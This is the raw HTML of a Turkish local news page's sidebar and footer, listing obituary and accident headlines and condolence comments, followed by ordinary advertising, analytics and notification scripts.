ticari...</strong> <span class="en-spot en-hidden">Elbistan’da yolda kar temizliği yapan iş makinesine çarpan hafif...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/otomobilin-carptigi-genc-hayatini-kaybetti-h69342.html" title="Otomobilin çarptığı genç hayatını..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/02/otomobilin_carptigi_genc_hayatini_kaybetti_h69342_d079d.jpg" alt="Otomobilin çarptığı genç hayatını..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/otomobilin-carptigi-genc-hayatini-kaybetti-h69342.html" title="" ><span class="en-hit">2.</span> <strong>Otomobilin çarptığı genç hayatını...</strong> <span class="en-spot en-hidden">Elbistan’da arkadaşı ile yolda yürürken otomobil çarpan 18 yaşındaki...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/hatice-ayda-gozukara-27-yasinda-h69179.html" title="Hatice Ayda Gözükara 27 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/02/hatice_ayda_gozukara_27_yasinda_h69179_9805e.jpg" alt="Hatice Ayda Gözükara 27 yaşında" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/hatice-ayda-gozukara-27-yasinda-h69179.html" title="" ><span class="en-hit">3.</span> <strong>Hatice Ayda Gözükara 27 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/ozgur-yesilbas-42-yasinda-h69289.html" title="Özgür Yeşilbaş 42 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/02/ozgur_yesilbas_42_yasinda_h69289_88f7a.jpg" alt="Özgür Yeşilbaş 42 yaşında" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/ozgur-yesilbas-42-yasinda-h69289.html" title="" ><span class="en-hit">4.</span> <strong>Özgür Yeşilbaş 42 yaşında</strong> <span class="en-spot en-hidden">Özgür Yeşilbaş 42 yaşında</span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/yusuf-tapan-23-yasinda-h69297.html" title="Yusuf Tapan 23 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/02/yusuf_tapan_23_yasinda_h69297_fe4e6.jpg" alt="Yusuf Tapan 23 yaşında" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/yusuf-tapan-23-yasinda-h69297.html" title="" ><span class="en-hit">5.</span> <strong>Yusuf Tapan 23 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> </ul> </div> </div> </div> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo"> <span class="encoklar-icon"><i class="halflings-icon white comments"></i></span><h5>Bu Ay Çok Yorumlananlar</h5></a> </div> <div id="collapseTwo" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/vefatlar/yasar-cengiz-76-yasinda-h69332.html" title="Yaşar Cengiz 76 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/02/yasar_cengiz_76_yasinda_h69332_ba848.jpeg" alt="Yaşar Cengiz 76 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/yasar-cengiz-76-yasinda-h69332.html" title="" ><span class="en-hit">1.</span> <strong>Yaşar Cengiz 76 yaşında</strong> <span class="en-spot en-hidden">Yaşar Cengiz 76 yaşında</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/ozgur-yesilbas-42-yasinda-h69289.html" title="Özgür Yeşilbaş 42 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/02/ozgur_yesilbas_42_yasinda_h69289_88f7a.jpg" alt="Özgür Yeşilbaş 42 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/ozgur-yesilbas-42-yasinda-h69289.html" title="" ><span class="en-hit">2.</span> <strong>Özgür Yeşilbaş 42 yaşında</strong> <span class="en-spot en-hidden">Özgür Yeşilbaş 42 yaşında</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/suleyman-arig-78-yasinda-h69256.html" title="Süleyman Arığ 78 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/02/suleyman_arig_78_yasinda_h69256_ec4b3.jpg" alt="Süleyman Arığ 78 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/suleyman-arig-78-yasinda-h69256.html" title="" ><span class="en-hit">3.</span> <strong>Süleyman Arığ 78 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/sonmez-dumlupinar-h69277.html" title="Sönmez Dumlupınar" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/02/sonmez_dumlupinar_h69277_e12cc.jpeg" alt="Sönmez Dumlupınar"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/sonmez-dumlupinar-h69277.html" title="" ><span class="en-hit">4.</span> <strong>Sönmez Dumlupınar</strong> <span class="en-spot en-hidden">Sönmez Dumlupınar</span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/dogan-kozan-h69412.html" title="Doğan Kozan" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/03/dogan_kozan_h69412_895af.jpg" alt="Doğan Kozan"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/dogan-kozan-h69412.html" title="" ><span class="en-hit">5.</span> <strong>Doğan Kozan</strong> <span class="en-spot en-hidden">Doğan Kozan</span></a></div></li> </ul> </div> </div> </div> </div> </div> <!-- SON YORUMLAR --> <div class="sayfalar"> <div class="header"> <h5>Son Yorumlar</h5> </div> <div class="content"> <ul class="unstyled"> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hacer-turk-h69428.html#comment_342507" title="" >Hacer aplaya Allah rahmet eylesin mekanı...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hacer-turk-h69428.html#comment_342505" title="" >Allah Rahmet eylesin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hacer-turk-h69428.html#comment_342504" title="" >Merhumeye Allah&#39;tan rahmet başta Murat...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-hanifi-ceran-h69416.html#comment_342503" title="" >ALLAH RAHMET ETSİN MEKANI CENNET OLSUN...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hacer-turk-h69428.html#comment_342502" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hacer-turk-h69428.html#comment_342501" title="" >ALLAHIM RAHMET EYLESİN MEKANINI CENNET...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hacer-turk-h69428.html#comment_342500" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/dogan-kozan-h69412.html#comment_342499" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hacer-turk-h69428.html#comment_342498" title="" >ALLAH RAHMET EYLESİN MEKANI CENNET OLSUN.</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/dogan-kozan-h69412.html#comment_342497" title="" >Allah rahmet etsin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hacer-turk-h69428.html#comment_342496" title="" >Başınız saolsun Allah rahmet etsin mekanı...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hacer-turk-h69428.html#comment_342495" title="" >Yüceler yücesi Allah cc Gani Gani rahmet...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/abdulkadir-bozdogan-h69411.html#comment_342494" title="" >Allah rahmet eylesin.</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hacer-turk-h69428.html#comment_342493" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hacer-turk-h69428.html#comment_342492" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-giyan-ceran-h69415.html#comment_342491" title="" >Hakkın rahmetine kavuşan merhum merhumeye...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/dogan-kozan-h69412.html#comment_342490" title="" >Hakkın rahmetine kavuşan merhum merhumeye...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/vefat-tesekkur-haci-ilyas-ugur-h69401.html#comment_342489" title="" >Hakkın rahmetine kavuşan merhum merhumeye...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hacer-turk-h69428.html#comment_342488" title="" >Alllah rahmet eylesin mekani cennet olsun...</a></li> <li class="last"><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hacer-turk-h69428.html#comment_342487" title="" >Allah&#39;ım rahmet eylesin mekanı cennet...</a></li> </ul> </div> </div> <!-- ARSIV --> <div class="arsiv"> <div class="header"> <h5>Arşiv</h5> </div> <div class="content"> <form action="http://www.elbistaninsesi.com/?m=arsiv" method="post" name="arsiv" > <select name="gun" class="day span1"> <option value="01" >01</option> <option value="02" >02</option> <option value="03" >03</option> <option value="04" >04</option> <option value="05" >05</option> <option value="06" selected>06</option> <option value="07" >07</option> <option value="08" >08</option> <option value="09" >09</option> <option value="10" >10</option> <option value="11" >11</option> <option value="12" >12</option> <option value="13" >13</option> <option value="14" >14</option> <option value="15" >15</option> <option value="16" >16</option> <option value="17" >17</option> <option value="18" >18</option> <option value="19" >19</option> <option value="20" >20</option> <option value="21" >21</option> <option value="22" >22</option> <option value="23" >23</option> <option value="24" >24</option> <option value="25" >25</option> <option value="26" >26</option> <option value="27" >27</option> <option value="28" >28</option> <option value="29" >29</option> <option value="30" >30</option> <option value="31" >31</option> </select> <select name="ay" class="month span1"> <option value="01" >Ocak</option> <option value="02" >Şubat</option> <option value="03" selected>Mart</option> <option value="04" >Nisan</option> <option value="05" >Mayıs</option> <option value="06" >Haziran</option> <option value="07" >Temmuz</option> <option value="08" >Ağustos</option> <option value="09" >Eylül</option> <option value="10" >Ekim</option> <option value="11" >Kasım</option> <option value="12" >Aralık</option> </select> <select name="yil" class="year span1"> <option value="2021" selected>2021</option> <option value="2020" >2020</option> <option value="2019" >2019</option> <option value="2018" >2018</option> <option value="2017" >2017</option> </select> <button type="submit" class="btn btn-default pull-right">Ara</button> </form> </div> </div> </div> </div> <!-- Sol Dikey Reklam --> <div class="reklam dikey sol" style="width:px;height:px;"> </div> <!-- Sağ Dikey Reklam --> <div class="reklam dikey sag ortala" style="width:px;height:px;"> <p style="width:160px;"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- kaynarca --> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3633419220222736" data-ad-slot="5807534991" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></p> </div> </div> <!-- FOOTER --> <div id="siteFooter" class="footer"> <div class="row-fluid"> <div class="container center"> <div class="span4"> <div>Copyright © 2021 - Tüm hakları saklıdır.<br>Elbistanın Sesi</div> <div class="footer-social"> <a href="https://facebook.com/elbistaninsesi" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/facebook_circle-32.png" alt="FACEBOOK"></a> <a href="https://twitter.com/elbistaninsesi" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/twitter_circle-32.png" alt="TWITTER"></a> <a href="https://www.instagram.com/elbistaninsesi_/" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/ins-ico.png" width="32" height="32" /> <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/google_circle-32.png" alt="GOOGLE PLUS"></a> <a href="http://www.elbistaninsesi.com/rss"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/rss_circle-32.png" alt="RSS"></a> </div> </div> <div class="span4 text-center"> <div class="footer-logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_1.jpg" alt="Park Fizyo’dan ağrılara GTOS terapi çözümü" /></a></div> </div> <div class="span4"> <p><center> 0 (344) 415 04 15 <br> <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="593c353b302a2d383730372a3c2a303e38233c2d3c2a30193e34383035773a3634">[email&#160;protected]</a> <br>Kızılcaoba Mah. Kışla Cad. 19/1</center> </p> <p class="site-info glyphicons earphone">0 (344) 415 04 15</p> </div> </div> </div> <div id="footer-alt" class="row-fluid"> <div class="container center"> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/m/" class="footer-alt-mobil glyphicons iphone"><strong>Mobil</strong>Mobil siteyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/kunye.html" class="footer-alt-reklam glyphicons global"><strong>Künye</strong>Künyeyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/iletisim.html" class="footer-alt-iletisim glyphicons headset"><strong>İletişim</strong>Bize ulaşın.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="#" class="footer-alt-iletisim glyphicons embed_close"><strong>Sitene Ekle</strong>Güncel haberleri ekleyin.</a></div> </div> </div> </div> <div class="row-fluid"> <div class="container center"> <div class="span12 text-center"> <p>Bu sitede yayınlanan tüm materyalin her hakkı mahfuzdur. Kaynak gösterilse bile gazetemizin izni olmadan yayınlanamaz.</p> <p><a href="http://www.haber-sistemi.com" title="Haber Scripti">Haber Scripti</a> | <a href="http://www.tebilisim.com" title="TE Bilişim" target="_blank">TE Bilişim<br> </div> </div> </div> <div id="top" class="btn btn-inverse">Yukarı Çık</div> </div> <div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Üye Girişi</h3> </div> <div class="modal-body"> <form class="form-horizontal" action="http://www.elbistaninsesi.com/index.php?m=login&rd=http%3A%2F%2Fwww.elbistaninsesi.com%2Fguncel%2Fpark-fizyodan-agrilara-gtos-terapi-cozumu-h69447.html" method="post"> <div class="control-group"> <label class="control-label" for="inputName">Kullanıcı Adı</label> <div class="controls"> <input id="inputName" value="" name="kullanici" type="text" placeholder="Kullanıcı Adı" required> </div> </div> <div class="control-group"> <label class="control-label" for="inputPassword">Şifre</label> <div class="controls"> <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required> </div> </div> <div class="control-group"> <div class="controls"> <button type="submit" class="btn btn-info">Giriş Yap</button> </div> </div> </form> </div> <div class="modal-footer"> <a href="http://www.elbistaninsesi.com/uyelik.html" class="pull-left btn">Üye Ol</a> <a href="http://www.elbistaninsesi.com/unuttum.html" class="pull-left btn">Şifremi unuttum?</a> <button class="btn btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button> </div> </div> <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery-1.9.1.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/modernizr.custom.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/classie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/uisearch.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/login.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.showbizpro.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cookie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.mousewheel.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.scrollbar.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cycle.all.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/base.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/waypoints.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/sticky.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/comments.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.pKisalt.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/getshares.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment-tr.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.elevateZoom-3.0.8.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/system-min.js"></script> <script type="text/javascript">	new UISearch( document.getElementById( 'sb-search' ) );	$(function(){	});	$("#comment_list .text").pKisalt();	var gsTitle = document.querySelectorAll(".gs-title")[0].innerHTML;	var gsSpace = ' ';	var gsUrl = location.href;	new GetShare({ root: $(".gs-facebook"), network: "facebook", share: { }	});	new GetShare({ root: $(".gs-twitter"), network: "twitter", share: { message:gsTitle+gsSpace+gsUrl }	});	new GetShare({ root: $(".gs-google"), network: "googleplus", share: { }	});	new GetShare({ root: $(".gs-linkedin"), network: "linkedin", share: { }	});	jQuery('#anasayfayazar').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[4,4,4,4],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"off",	delay:4000,	speed:750	});	jQuery('#gununmansetleri').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[6,6,6,6],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"on",	delay:4000,	speed:750	});	$('#haber > .page-header').waypoint(function(direction) { $('#article-finished').toggleClass('hiding', direction === "up");	}, { offset: function() { return $.waypoints('viewportHeight') - $(this).height() - 750; }	});	function addLink() { var kisa_site_adi = "Elbistanın Sesi"; var kopyala_imza_onu = "Kaynak: http://www.elbistaninsesi.com"; var body_element = document.getElementsByTagName('body')[0]; var selection; selection = window.getSelection(); var pagelink = "<br><br>" + kopyala_imza_onu + "<a href='"+document.location.href+"'>"+document.location.href+"</a><br><br>" + kisa_site_adi; var copytext = selection + pagelink; var newdiv = document.createElement('div'); newdiv.style.position='absolute'; newdiv.style.left='-99999px'; body_element.appendChild(newdiv); newdiv.innerHTML = copytext; selection.selectAllChildren(newdiv); window.setTimeout(function() { body_element.removeChild(newdiv); },0);	}	document.oncopy = addLink;	tebilisim('69447', 'haber', ''); </script> <!-- Google Analytics --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', analitik_ga, 'auto'); ga('send', 'pageview'); </script> <!-- End Google Analytics --> <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async='async'></script> <script> var OneSignal = window.OneSignal || [];	OneSignal.push(["init", {	appId: "51fe1034-635b-4e70-859b-1fc8dff5f28d",	autoRegister: true,	subdomainName: 'elbistaninsesi',	setDefaultNotificationUrl: 'http://www.elbistaninsesi.com/',	notifyButton: { enable: false	},	/*	welcomeNotification: { "title": "Hoş geldiniz", "message": "Bildirimlerimize üye olduğunuz teşekkür ederiz.",	},	*/ promptOptions: { actionMessage: "Sondakika haberlerimizi anında öğrenebilmek için bildirimleri kabul edin!", acceptButtonText: "ABONE OL", cancelButtonText: "İSTEMİYORUM", autoAcceptTitle: '"İzin ver" butonuna tıklayın', exampleNotificationCaption: '(istediğin zaman aboneliğini iptal edebilirsin)', } }]); </script> </body> </html> 